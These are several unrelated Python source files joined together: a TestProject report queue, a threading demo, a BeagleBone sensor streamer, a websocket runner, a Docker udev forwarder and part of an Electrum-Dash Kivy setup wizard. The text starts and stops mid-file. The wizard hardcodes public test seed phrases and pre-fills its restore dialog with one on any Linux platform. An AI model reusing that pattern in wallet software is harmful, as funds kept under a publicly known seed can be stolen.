elif self.verbose: sys.stderr.write('done.\n') return p
reports_queue.py
# Copyright 2021 TestProject (https://testproject.io) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import queue import threading import logging from src.testproject.tcp import SocketManager from typing import Optional import requests from requests import HTTPError class ReportsQueue: REPORTS_QUEUE_TIMEOUT = 10 def __init__(self, token: str): self._token = token self._close_socket = False # Running after all is initialized successfully self._running = True # After session started and is running, start the reporting thread self._queue = queue.Queue() self._reporting_thread = threading.Thread(target=self._report_worker, daemon=True) self._reporting_thread.start() def submit(self, report_as_json: [dict], url: [str], block: [bool]): queue_item = QueueItem( report_as_json=report_as_json, url=url, token=self._token, ) self._queue.put(queue_item, block=block) def stop(self): """Send all remaining report items in the queue to TestProject""" # Send a stop signal to the thread worker self._running = False # Send a final, empty, report to the queue to ensure that # the 'running' condition is evaluated one last time self._queue.put(QueueItem(report_as_json=None, url=None, token=self._token), block=False) # Wait until all items have been reported or timeout passes self._reporting_thread.join(timeout=self.REPORTS_QUEUE_TIMEOUT) if self._reporting_thread.is_alive(): # Thread is still alive, so there are unreported items logging.warning(f"There are {self._queue.qsize()} unreported items in the queue") def _report_worker(self): """Worker method that is polling the queue for items to report""" while self._running or self._queue.qsize() > 0: item = self._queue.get() if isinstance(item, QueueItem): self._handle_report(item) else: logging.warning(f"Unknown object of type {type(item)} found on queue, ignoring it..") self._queue.task_done() # Close socket only after agent_client is no longer running and all reports in the queue have been sent. if self._close_socket: SocketManager.instance().close_socket() def _handle_report(self, item: [object]): item.send() class QueueItem: """Helper class representing an item to be reported Args: report_as_json (dict): JSON payload representing the item to be reported url (str): Agent endpoint the payload should be POSTed to token (str): Token used to authenticate with the Agent Attributes: _report_as_json (Optional[dict]): JSON payload representing the item to be reported _url (Optional[str]): Agent endpoint the payload should be POSTed to _token (str): Token used to authenticate with the Agent """ def __init__(self, report_as_json: Optional[dict], url: Optional[str], token: str): self._report_as_json = report_as_json self._url = url self._token = token def send(self): """Send a report item to the Agent""" max_report_failure_attempts = 4 if self._report_as_json is None and self._url is None: # Skip empty queue items put in the queue on stop() return for i in range(max_report_failure_attempts): with requests.Session() as session: response = session.post( self._url, headers={"Authorization": self._token}, json=self._report_as_json, ) try: response.raise_for_status() return except HTTPError: remaining_attempts = max_report_failure_attempts - i - 1 logging.warning( f"Agent responded with an unexpected status {response.status_code}, " f"response from Agent: {response.text}" ) logging.info(f"Failed to send a report to the Agent, {remaining_attempts} attempts remaining...") logging.error(f"All {max_report_failure_attempts} attempts to send report have failed.") @property def report_as_json(self): return self._report_as_json
thr_1.py
import threading import time def thread_job(): print('T1 start\n') for i in range(10): time.sleep(0.2) print('T1 end\n') def thread_job2(): print('T2 start\n') print('T2 end\n') def main(): added_thread1 = threading.Thread(target=thread_job,name='T1') added_thread2 = threading.Thread(target=thread_job2,name='T2') added_thread1.start() added_thread2.start() print(threading.active_count()) added_thread1.join() added_thread2.join() print('All done\n') if __name__ == '__main__': print(len(str(499999999666666667166666666000000000)))
read10axis.py
import beagle as bg import argparse import sys import time import csv import threading import socket import pickle from glob import glob class Beagle(object): def __init__(self, axis_10): self._axis_10 = axis_10 self._mpu = bg.MPU() self.__load_config() def __load_config(self): config = glob('config.sock')[0] with open(config, 'r') as f: self._ip_addr = f.readline()[:-1] self._port = int(f.readline()[:-1]) self._label = f.readline()[:-1] f.close() def capture_sensor(self, mode='all'): ts = time.time() st = bg.get_datetime(ts).strftime('%Y-%m-%d_%H%M%S') threads = {} try: threads['local'] = threading.Thread(target=self.__send_to_local, args=(st,)) threads['remote'] = threading.Thread(target=self.__send_to_remote, args=(st,)) for key, thread in threads.items(): if mode in [key, 'all']: thread.daemon = True thread.start() while True: time.sleep(100) except (KeyboardInterrupt, Exception): pass for _, thread in threads.items(): if thread.isAlive(): thread.join() def __get_raw_data_row(self): ts = time.time() accel = self._mpu.mpu_read_accel() gyro = self._mpu.mpu_read_gyro() row = [ts] if self._axis_10: temp = self._mpu.mpu_read_temp() row += [temp] row += [accel['ax'], accel['ay'], accel['az']] row += [gyro['gx'], gyro['gy'], gyro['gz']] if self._axis_10: mag = self._mpu.mpu_read_mag() row += [mag['mx'], mag['my'], mag['mz']] return row def __send_to_local(self, st): start_st = st sys.stdout.write('[%s] Start reading sensor data to local...\n' % st) sys.stdout.flush() try: with open(st + '.csv', 'w') as f: writer = csv.writer(f) if self._axis_10: writer.writerow(['timestamp', 'temp', 'imu_ax', 'imu_ay', 'imu_az', 'imu_gx', 'imu_gy', 'imu_gz', 'imu_mx', 'imu_my', 'imu_mz']) else: writer.writerow(['timestamp', 'imu_ax', 'imu_ay', 'imu_az', 'imu_gx', 'imu_gy', 'imu_gz']) data_rows = 0 while True: try: row = self.__get_raw_data_row() writer.writerow(row) data_rows += 1 if data_rows % 10000 == 0: ts = time.time() st = bg.get_datetime(ts).strftime('%Y-%m-%d_%H%M%S') sys.stdout.write('[%s] %6d rows have been collected.\n' % (st, data_rows)) sys.stdout.flush() except (KeyboardInterrupt, TypeError): break f.close() ts = time.time() st = bg.get_datetime(ts).strftime('%Y-%m-%d_%H%M%S') sys.stdout.write('[%s] \"%s\" was saved.\n' % (st, start_st + '.csv')) sys.stdout.flush() except IOError: sys.stderr.write('Failed to build CSV.\n') sys.stderr.flush() def __send_to_remote(self, st): sys.stdout.write('[%s] Start reading sensor data to remote...\n' % st) sys.stdout.flush() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((self._ip_addr, self._port)) sys.stdout.write('connect %s successful\n' % self._ip_addr) sys.stdout.flush() data_rows = 0 while True: try: row = self.__get_raw_data_row() send_row = row + [data_rows, self._label] send_data = pickle.dumps(send_row) sock.sendall(send_data) data_rows += 1 if data_rows % 10000 == 0: ts = time.time() st = bg.get_datetime(ts).strftime('%Y-%m-%d_%H%M%S') sys.stdout.write('[%s] %6d rows have been collected.\n' % (st, data_rows)) sys.stdout.flush() except KeyboardInterrupt: send_row = ['Q'] sock.sendall(pickle.dumps(send_row)) break sock.close() def main(): parser = argparse.ArgumentParser(description='Collect data from BeagleBone Blue') parser.add_argument('-6', help='10 Axis', action='store_true', default='True') args = vars(parser.parse_args()) axis_10 = not args['6'] bg_ = Beagle(axis_10) bg_.capture_sensor('all') return 0 if __name__ == '__main__': main()
run.py
'''Core run service with the initial 'run_core' function to boot a main queue thread and waiting socket. ''' from multiprocessing import Process, Queue import json_socket from log import log from initial import run_core standard_config = dict( socket_uri="ws://127.0.0.1:8009", ) queue_prc = None socket_prc = None def _json_socket(uri): socket = json_socket.get_socket() if uri is not None: socket = json_socket.get_or_create(uri) return socket def socket_receiver(queue, config=None): config = config or {} uri = config.get('socket_uri', None) socket = _json_socket(uri) if socket is None: # no worker to run. return False run = 1 while run: m = socket.recv() if m == 'kill': run = 0 queue.put(m) log('finished socket_receiver') def thread_run(queue=None, config=None): global queue_prc global socket_prc conf = config or {} settings = standard_config.copy() settings.update(conf) q = queue or Queue() socket_prc = Process(target=socket_receiver, args=(q, settings)) socket_prc.start() global_prc = Process(target=run_core, args=(q, settings)) global_prc.start() return global_prc, q
udev-forward.py
#!/usr/bin/python3 # Copyright 2019 Linaro Limited # Copyright (c) 2014 Taeyeon Mori (for MurmurHash2 code) # Author: Kumar Gala <kumar.gala@linaro.org> # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301, USA. # # The MurmurHash2 implementation is take from: # https://github.com/Orochimarufan/cdev/blob/master/cdev/murmurhash2.py # # UDEV event forwarding to a container # # based on https://github.com/eiz/udevfw import os import sys import socket import pyudev import syslog import threading import docker import queue import array from struct import * from ctypes import CDLL, get_errno import argparse NETLINK_KOBJECT_UEVENT = 15 UDEV_MONITOR_UDEV = 2 CLONE_NEWNET = 0x40000000 UDEV_MONITOR_MAGIC = 0xFEEDCAFE containers = {} class containersClass: def __init__(self): self.thread = threading.Thread() self.wq = queue.Queue() if array.array('L').itemsize == 4: uint32_t = 'L' elif array.array('I').itemsize == 4: uint32_t = 'I' else: raise ImportError("Could not determine 4-byte array code!") def MurmurHash2(input, seed=0): """ Generate a 32-bit hash from a string using the MurmurHash2 algorithm takes a bytestring! Pure-python implementation. """ l = len(input) # m and r are mixing constants generated offline # They're not really magic, they just happen to work well m = 0x5bd1e995 #r = 24 # Initialize the hash to a "random" value h = seed ^ l # Mix 4 bytes at a time into the hash x = l % 4 o = l - x for k in array.array(uint32_t, input[:o]): # Original Algorithm #k *= m; #k ^= k >> r; #k *= m; #h *= m; #h ^= k; # My Algorithm k = (k * m) & 0xFFFFFFFF h = (((k ^ (k >> 24)) * m) ^ (h * m)) & 0xFFFFFFFF # Explanation: We need to keep it 32-bit. There are a few rules: # 1. Inputs to >> must be truncated, it never overflows # 2. Inputs to * must be truncated, it may overflow # 3. Inputs to ^ may be overflowed, it overflows if any input was overflowed # 4. The end result must be truncated # Therefore: # b = k * m -> may overflow, we truncate it because b >> r cannot take overflowed data # c = b ^ (b >> r) -> never overflows, as b is truncated and >> never does # h = (c * m) ^ (h * m) -> both inputs to ^ may overflow, but since ^ can take it, we truncate once afterwards. # Handle the last few bytes of the input array if x > 0: if x > 2: h ^= input[o+2] << 16 if x > 1: h ^= input[o+1] << 8 h = ((h ^ input[o]) * m) & 0xFFFFFFFF # Do a few final mixes of the hash to ensure the last few # bytes are well incorporated # Original: #h ^= h >> 13; #h *= m; #h ^= h >> 15; h = ((h ^ (h >> 13)) * m) & 0xFFFFFFFF return (h ^ (h >> 15)) def bloomHash(tag): bits = 0 hash = MurmurHash2(tag.encode()) bits = bits | 1 << (hash & 63) bits = bits | 1 << ((hash >> 6) & 63) bits = bits | 1 << ((hash >> 12) & 63) bits = bits | 1 << ((hash >> 18) & 63) return bits def buildHeader(proplen, subsys, devtype, taghash): header_fmt = "8s8I" header_size = calcsize(header_fmt) subsys_hash = 0 devtype_hash = 0 if subsys: subsys_hash = socket.htonl(MurmurHash2(subsys.encode())) if devtype: devtype_hash = socket.htonl(MurmurHash2(devtype.encode())) tag_low = socket.htonl(taghash & 0xffffffff) tag_high = socket.htonl(taghash >> 32) return pack(header_fmt, b"libudev", socket.htonl(UDEV_MONITOR_MAGIC), header_size, header_size, proplen, subsys_hash, devtype_hash, tag_low, tag_high) def BuildPacket(dev): subsys = dev.subsystem devtype = dev.device_type proplist = bytearray() for p in dev.properties: proppair = p + "=" + dev.properties[p] proplist = proplist + proppair.encode() + bytes([0]) tag_hash = 0 for t in dev.tags: tag_hash = tag_hash | bloomHash(t) hdr = buildHeader(len(proplist), subsys, devtype, tag_hash) return hdr + proplist def errcheck(ret, func, args): if ret == -1: e = get_errno() raise OSError(e, os.strerror(e)) def sendMsgThread(inst, netns_file): nsfd = open(netns_file, "r") libc = CDLL('libc.so.6', use_errno=True) libc.setns.errcheck = errcheck libc.setns(nsfd.fileno(), CLONE_NEWNET) sendfd = socket.socket(socket.AF_NETLINK, socket.SOCK_RAW|socket.SOCK_NONBLOCK, NETLINK_KOBJECT_UEVENT) if options.debug: print(sendfd) while True: (work_type, pkt) = containers[inst].wq.get() if work_type == "PKT": # Older kernels (like 4.15 on Ubuntu 18.04) return ECONNREFUSED # to work around this we just ignore this specific error as the # data still is send on the socket. try: sendfd.sendto(pkt, (0, UDEV_MONITOR_UDEV)) except ConnectionRefusedError: pass if work_type == "DOCKER": nsfd.close() break def udev_event_callback(dev): if options.debug: print('background event {0.action}: {0.device_path}'.format(dev)) for i in containers: if containers[i].thread.is_alive(): containers[i].wq.put(("PKT", BuildPacket(dev))) def start_up_thread(name): container = client.containers.get(name) ns_filename = container.attrs['NetworkSettings']['SandboxKey'] if options.debug: print("DBG: Container[%s] netns file %s" % (name, ns_filename)) containers[name] = containersClass() containers[name].thread = threading.Thread(name=name, target=sendMsgThread, args=(name, ns_filename)) containers[name].thread.start() def main(): parser = argparse.ArgumentParser(description='USB device passthrough for docker containers', add_help=False) parser.add_argument("-i", "--instance", type=str, required=True, action='append', help="Docker instance", dest="names") parser.add_argument("-d", "--debug", action="store_true", help="Enable Debug Logging") global options options = parser.parse_args() context = pyudev.Context() if options.debug: context.log_priority = syslog.LOG_DEBUG monitor = pyudev.Monitor.from_netlink(context) observer = pyudev.MonitorObserver(monitor, callback=udev_event_callback, name='monitor-observer') observer.start() global client client = docker.from_env() # If the container is running get the namespace file (SandboxKey) # and startup the sendMsgThread f = {'name': options.names, 'status': 'running'} if client.containers.list(filters=f): for name in options.names: start_up_thread(name) # Watch for docker events to startup or shutdown a new sendMsgThread f = {'type': 'container', 'event': ['start', 'stop'], 'container': options.names } try: for event in client.events(decode=True, filters=f): name = event['Actor']['Attributes']['name'] if options.debug: print("DOCKER: %s for %s" % (event['Action'], name)) if event['Action'] == 'start': start_up_thread(name) if event['Action'] == 'stop': containers[name].wq.put(("DOCKER", event['Action'])) containers[name].thread.join() except KeyboardInterrupt: for i in containers: if containers[i].thread.is_alive(): containers[i].wq.put(("DOCKER", 'stop')) if __name__ == '__main__': main()
installwizard.py
from functools import partial import threading import os from kivy.app import App from kivy.clock import Clock from kivy.lang import Builder from kivy.properties import ObjectProperty, StringProperty, OptionProperty from kivy.core.window import Window from kivy.uix.button import Button from kivy.utils import platform from kivy.uix.widget import Widget from kivy.core.window import Window from kivy.clock import Clock from kivy.utils import platform from electrum_dash.base_wizard import BaseWizard from electrum_dash.util import is_valid_email from . import EventsDialog from ...i18n import _ from .password_dialog import PasswordDialog # global Variables is_test = (platform == "linux") test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve" test_seed = "grape impose jazz bind spatial mind jelly tourist tank today holiday stomach" test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL" Builder.load_string(''' #:import Window kivy.core.window.Window #:import _ electrum_dash.gui.kivy.i18n._ <WizardTextInput@TextInput> border: 4, 4, 4, 4 font_size: '15sp' padding: '15dp', '15dp' background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1) foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1) hint_text_color: self.foreground_color background_active: 'atlas://electrum_dash/gui/kivy/theming/light/create_act_text_active' background_normal: 'atlas://electrum_dash/gui/kivy/theming/light/create_act_text_active' size_hint_y: None height: '48sp' <WizardButton@Button>: root: None size_hint: 1, None height: '48sp' on_press: if self.root: self.root.dispatch('on_press', self) on_release: if self.root: self.root.dispatch('on_release', self) <BigLabel@Label> color: .854, .925, .984, 1 size_hint: 1, None text_size: self.width, None height: self.texture_size[1] bold: True <-WizardDialog> text_color: .854, .925, .984, 1 value: '' #auto_dismiss: False size_hint: None, None canvas.before: Color: rgba: .239, .588, .882, 1 Rectangle: size: Window.size crcontent: crcontent # add electrum icon BoxLayout: orientation: 'vertical' if self.width < self.height else 'horizontal' padding: min(dp(27), self.width/32), min(dp(27), self.height/32),\ min(dp(27), self.width/32), min(dp(27), self.height/32) spacing: '10dp' GridLayout: id: grid_logo cols: 1 pos_hint: {'center_y': .5} size_hint: 1, None height: self.minimum_height Label: color: root.text_color text: 'DASH ELECTRUM' size_hint: 1, None height: self.texture_size[1] if self.opacity else 0 font_size: '33sp' font_name: 'electrum_dash/gui/kivy/data/fonts/tron/Tr2n.ttf' GridLayout: cols: 1 id: crcontent spacing: '1dp' Widget: size_hint: 1, 0.3 GridLayout: rows: 1 spacing: '12dp' size_hint: 1, None height: self.minimum_height WizardButton: id: back text: _('Back') root: root WizardButton: id: next text: _('Next') root: root disabled: root.value == '' <WizardMultisigDialog> value: 'next' Widget size_hint: 1, 1 Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: _("Choose the number of signatures needed to unlock funds in your wallet") Widget size_hint: 1, 1 GridLayout: orientation: 'vertical' cols: 2 spacing: '14dp' size_hint: 1, 1 height: self.minimum_height Label: color: root.text_color text: _('From {} cosigners').format(n.value) Slider: id: n range: 2, 5 step: 1 value: 2 Label: color: root.text_color text: _('Require {} signatures').format(m.value) Slider: id: m range: 1, n.value step: 1 value: 2 <WizardChoiceDialog> message : '' Widget: size_hint: 1, 1 Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: root.message Widget size_hint: 1, 1 GridLayout: row_default_height: '48dp' orientation: 'vertical' id: choices cols: 1 spacing: '14dp' size_hint: 1, None <WizardConfirmDialog> message : '' Widget: size_hint: 1, 1 Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: root.message Widget size_hint: 1, 1 <WizardTOSDialog> message : '' size_hint: 1, 1 ScrollView: size_hint: 1, 1 TextInput: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.minimum_height text: root.message disabled: True <WizardEmailDialog> Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: 'Please enter your email address' WizardTextInput: id: email on_text: Clock.schedule_once(root.on_text) multiline: False on_text_validate: Clock.schedule_once(root.on_enter) <WizardKnownOTPDialog> message : '' message2: '' Widget: size_hint: 1, 1 Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: root.message Widget size_hint: 1, 1 WizardTextInput: id: otp on_text: Clock.schedule_once(root.on_text) multiline: False on_text_validate: Clock.schedule_once(root.on_enter) Widget size_hint: 1, 1 Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: root.message2 Widget size_hint: 1, 1 height: '48sp' BoxLayout: orientation: 'horizontal' WizardButton: id: cb text: _('Request new secret') on_release: root.request_new_secret() size_hint: 1, None WizardButton: id: abort text: _('Abort creation') on_release: root.abort_wallet_creation() size_hint: 1, None <WizardNewOTPDialog> message : '' message2 : '' Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: root.message QRCodeWidget: id: qr size_hint: 1, 1 Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: root.message2 WizardTextInput: id: otp on_text: Clock.schedule_once(root.on_text) multiline: False on_text_validate: Clock.schedule_once(root.on_enter) <MButton@Button>: size_hint: 1, None height: '33dp' on_release: self.parent.update_amount(self.text) <WordButton@Button>: size_hint: None, None padding: '5dp', '5dp' text_size: None, self.height width: self.texture_size[0] height: '30dp' on_release: self.parent.new_word(self.text) <SeedButton@Button>: height: dp(100) border: 4, 4, 4, 4 halign: 'justify' valign: 'top' font_size: '18dp' text_size: self.width - dp(24), self.height - dp(12) color: .1, .1, .1, 1 background_normal: 'atlas://electrum_dash/gui/kivy/theming/light/white_bg_round_top' background_down: self.background_normal size_hint_y: None <SeedLabel@Label>: font_size: '12sp' text_size: self.width, None size_hint: 1, None height: self.texture_size[1] halign: 'justify' valign: 'middle' border: 4, 4, 4, 4 <RestoreSeedDialog> message: '' word: '' BigLabel: text: "ENTER YOUR SEED PHRASE" GridLayout cols: 1 padding: 0, '12dp' orientation: 'vertical' spacing: '12dp' size_hint: 1, None height: self.minimum_height SeedButton: id: text_input_seed text: '' on_text: Clock.schedule_once(root.on_text) on_release: root.options_dialog() SeedLabel: text: root.message BoxLayout: id: suggestions height: '35dp' size_hint: 1, None new_word: root.on_word BoxLayout: id: line1 update_amount: root.update_text size_hint: 1, None height: '30dp' MButton: text: 'Q' MButton: text: 'W' MButton: text: 'E' MButton: text: 'R' MButton: text: 'T' MButton: text: 'Y' MButton: text: 'U' MButton: text: 'I' MButton: text: 'O' MButton: text: 'P' BoxLayout: id: line2 update_amount: root.update_text size_hint: 1, None height: '30dp' Widget: size_hint: 0.5, None height: '33dp' MButton: text: 'A' MButton: text: 'S' MButton: text: 'D' MButton: text: 'F' MButton: text: 'G' MButton: text: 'H' MButton: text: 'J' MButton: text: 'K' MButton: text: 'L' Widget: size_hint: 0.5, None height: '33dp' BoxLayout: id: line3 update_amount: root.update_text size_hint: 1, None height: '30dp' Widget: size_hint: 1, None MButton: text: 'Z' MButton: text: 'X' MButton: text: 'C' MButton: text: 'V' MButton: text: 'B' MButton: text: 'N' MButton: text: 'M' MButton: text: ' ' MButton: text: '<' <AddXpubDialog> title: '' message: '' BigLabel: text: root.title GridLayout cols: 1 padding: 0, '12dp' orientation: 'vertical' spacing: '12dp' size_hint: 1, None height: self.minimum_height SeedButton: id: text_input text: '' on_text: Clock.schedule_once(root.check_text) SeedLabel: text: root.message GridLayout rows: 1 spacing: '12dp' size_hint: 1, None height: self.minimum_height IconButton: id: scan height: '48sp' on_release: root.scan_xpub() icon: 'atlas://electrum_dash/gui/kivy/theming/light/camera' size_hint: 1, None WizardButton: text: _('Paste') on_release: root.do_paste() WizardButton: text: _('Clear') on_release: root.do_clear() <ShowXpubDialog> xpub: '' message: _('Here is your master public key. Share it with your cosigners.') BigLabel: text: "MASTER PUBLIC KEY" GridLayout cols: 1 padding: 0, '12dp' orientation: 'vertical' spacing: '12dp' size_hint: 1, None height: self.minimum_height SeedButton: id: text_input text: root.xpub SeedLabel: text: root.message GridLayout rows: 1 spacing: '12dp' size_hint: 1, None height: self.minimum_height WizardButton: text: _('QR code') on_release: root.do_qr() WizardButton: text: _('Copy') on_release: root.do_copy() WizardButton: text: _('Share') on_release: root.do_share() <ShowSeedDialog> spacing: '12dp' value: 'next' BigLabel: text: "PLEASE WRITE DOWN YOUR SEED PHRASE" GridLayout: id: grid cols: 1 pos_hint: {'center_y': .5} size_hint_y: None height: self.minimum_height orientation: 'vertical' spacing: '12dp' SeedButton: text: root.seed_text on_release: root.options_dialog() SeedLabel: text: root.message <LineDialog> BigLabel: text: root.title SeedLabel: text: root.message TextInput: id: passphrase_input multiline: False size_hint: 1, None height: '27dp' SeedLabel: text: root.warning ''') class WizardDialog(EventsDialog): ''' Abstract dialog to be used as the base for all Create Account Dialogs ''' crcontent = ObjectProperty(None) def __init__(self, wizard, **kwargs): super(WizardDialog, self).__init__() self.wizard = wizard self.ids.back.disabled = not wizard.can_go_back() self.app = App.get_running_app() self.run_next = kwargs['run_next'] _trigger_size_dialog = Clock.create_trigger(self._size_dialog) Window.bind(size=_trigger_size_dialog, rotation=_trigger_size_dialog) _trigger_size_dialog() self._on_release = False def _size_dialog(self, dt): app = App.get_running_app() if app.ui_mode[0] == 'p': self.size = Window.size else: #tablet if app.orientation[0] == 'p': #portrait self.size = Window.size[0]/1.67, Window.size[1]/1.4 else: self.size = Window.size[0]/2.5, Window.size[1] def add_widget(self, widget, index=0): if not self.crcontent: super(WizardDialog, self).add_widget(widget) else: self.crcontent.add_widget(widget, index=index) def on_dismiss(self): app = App.get_running_app() if app.wallet is None and not self._on_release: app.stop() def get_params(self, button): return (None,) def on_release(self, button): self._on_release = True self.close() if not button: self.parent.dispatch('on_wizard_complete', None) return if button is self.ids.back: self.wizard.go_back() return params = self.get_params(button) self.run_next(*params) class WizardMultisigDialog(WizardDialog): def get_params(self, button): m = self.ids.m.value n = self.ids.n.value return m, n class WizardOTPDialogBase(WizardDialog): def get_otp(self): otp = self.ids.otp.text if len(otp) != 6: return try: return int(otp) except: return def on_text(self, dt): self.ids.next.disabled = self.get_otp() is None def on_enter(self, dt): # press next next = self.ids.next if not next.disabled: next.dispatch('on_release') class WizardKnownOTPDialog(WizardOTPDialogBase): def __init__(self, wizard, **kwargs): WizardOTPDialogBase.__init__(self, wizard, **kwargs) self.message = _("This wallet is already registered with TrustedCoin. To finalize wallet creation, please enter your Google Authenticator Code.") self.message2 =_("If you have lost your Google Authenticator account, you can request a new secret. You will need to retype your seed.") self.request_new = False def get_params(self, button): return (self.get_otp(), self.request_new) def request_new_secret(self): self.request_new = True self.on_release(True) def abort_wallet_creation(self): self._on_release = True os.unlink(self.wizard.storage.path) self.wizard.terminate() self.dismiss() class WizardNewOTPDialog(WizardOTPDialogBase): def __init__(self, wizard, **kwargs): WizardOTPDialogBase.__init__(self, wizard, **kwargs) otp_secret = kwargs['otp_secret'] uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret) self.message = "Please scan the following QR code in Google Authenticator. You may also use the secret key: %s"%otp_secret self.message2 = _('Then, enter your Google Authenticator code:') self.ids.qr.set_data(uri) def get_params(self, button): return (self.get_otp(), False) class WizardTOSDialog(WizardDialog): def __init__(self, wizard, **kwargs): WizardDialog.__init__(self, wizard, **kwargs) self.ids.next.text = 'Accept' self.ids.next.disabled = False self.message = kwargs['tos'] self.message2 = _('Enter your email address:') class WizardEmailDialog(WizardDialog): def get_params(self, button): return (self.ids.email.text,) def on_text(self, dt): self.ids.next.disabled = not is_valid_email(self.ids.email.text) def on_enter(self, dt): # press next next = self.ids.next if not next.disabled: next.dispatch('on_release') class WizardConfirmDialog(WizardDialog): def __init__(self, wizard, **kwargs): super(WizardConfirmDialog, self).__init__(wizard, **kwargs) self.message = kwargs.get('message', '') self.value = 'ok' def on_parent(self, instance, value): if value: app = App.get_running_app() self._back = _back = partial(app.dispatch, 'on_back') def get_params(self, button): return (True,) class WizardChoiceDialog(WizardDialog): def __init__(self, wizard, **kwargs): super(WizardChoiceDialog, self).__init__(wizard, **kwargs) self.message = kwargs.get('message', '') choices = kwargs.get('choices', []) layout = self.ids.choices layout.bind(minimum_height=layout.setter('height')) for action, text in choices: l = WizardButton(text=text) l.action = action l.height = '48dp' l.root = self layout.add_widget(l) def on_parent(self, instance, value): if value: app = App.get_running_app() self._back = _back = partial(app.dispatch, 'on_back') def get_params(self, button): return (button.action,) class LineDialog(WizardDialog): title = StringProperty('') message = StringProperty('') warning = StringProperty('') def __init__(self, wizard, **kwargs): WizardDialog.__init__(self, wizard, **kwargs) self.ids.next.disabled = False def get_params(self, b): return (self.ids.passphrase_input.text,) class ShowSeedDialog(WizardDialog): seed_text = StringProperty('') message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.") ext = False def __init__(self, wizard, **kwargs): super(ShowSeedDialog, self).__init__(wizard, **kwargs) self.seed_text = kwargs['seed_text'] def on_parent(self, instance, value): if value: app = App.get_running_app() self._back = _back = partial(self.ids.back.dispatch, 'on_release') def options_dialog(self): from .seed_options import SeedOptionsDialog def callback(status): self.ext = status d = SeedOptionsDialog(self.ext, callback) d.open() def get_params(self, b): return (self.ext,) class WordButton(Button): pass class WizardButton(Button): pass class RestoreSeedDialog(WizardDialog): def __init__(self, wizard, **kwargs): super(RestoreSeedDialog, self).__init__(wizard, **kwargs) self._test = kwargs['test'] from electrum_dash.mnemonic import Mnemonic from electrum_dash.old_mnemonic import words as old_wordlist self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist)) self.ids.text_input_seed.text = test_seed if is_test else '' self.message = _('Please type your seed phrase using the virtual keyboard.') self.title = _('Enter Seed') self.ext = False def options_dialog(self): from .seed_options import SeedOptionsDialog def callback(status): self.ext = status d = SeedOptionsDialog(self.ext, callback) d.open() def get_suggestions(self, prefix): for w in self.words: if w.startswith(prefix): yield w def on_text(self, dt): self.ids.next.disabled = not bool(self._test(self.get_text())) text = self.ids.text_input_seed.text if not text: last_word = '' elif text[-1] == ' ': last_word = '' else: last_word = text.split(' ')[-1] enable_space = False self.ids.suggestions.clear_widgets() suggestions = [x for x in self.get_suggestions(last_word)] if last_word in suggestions: b = WordButton(text=last_word) self.ids.suggestions.add_widget(b) enable_space = True for w in suggestions: if w != last_word and len(suggestions) < 10: b = WordButton(text=w) self.ids.suggestions.add_widget(b) i = len(last_word) p = set() for x in suggestions: if len(x)>i: p.add(x[i]) for line in [self.ids.line1, self.ids.line2, self.ids.line3]: for c in line.children: if isinstance(c, Button): if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ': c.disabled = (c.text.lower() not in p) and bool(last_word) elif c.text == ' ': c.disabled = not enable_space def on_word(self, w): text = self.get_text() words = text.split(' ') words[-1] = w text = ' '.join(words) self.ids.text_input_seed.text = text + ' ' self.ids.suggestions.clear_widgets() def get_text(self): ti = self.ids.text_input_seed return ' '.join(ti.text.strip().split()) def update_text(self, c): c = c.lower() text = self.ids.text_input_seed.text if c == '<': text = text[:-1] else: text += c self.ids.text_input_seed.text = text def on_parent(self, instance, value): if value: tis = self.ids.text_input_seed tis.focus = True #tis._keyboard.bind(on_key_down=self.on_key_down) self._back = _back = partial(self.ids.back.dispatch, 'on_release') app = App.get_running_app() def on_key_down(self, keyboard, keycode, key, modifiers): if keycode[0] in (13, 271): self.on_enter() return True def on_enter(self): #self._remove_keyboard() # press next next = self.ids.next if not next.disabled: next.dispatch('on_release') def _remove_keyboard(self): tis = self.ids.text_input_seed if tis._keyboard: tis._keyboard.unbind(on_key_down=self.on_key_down) tis.focus = False def get_params(self, b): return (self.get_text(), False, self.ext) class ConfirmSeedDialog(RestoreSeedDialog): def get_params(self, b): return (self.get_text(),) def options_dialog(self): pass class ShowXpubDialog(WizardDialog): def __init__(self, wizard, **kwargs): WizardDialog.__init__(self, wizard, **kwargs) self.xpub = kwargs['xpub'] self.ids.next.disabled = False def do_copy(self): self.app._clipboard.copy(self.xpub) def do_share(self): self.app.do_share(self.xpub, _("Master Public Key")) def do_qr(self): from .qr_dialog import QRDialog popup = QRDialog(_("Master Public 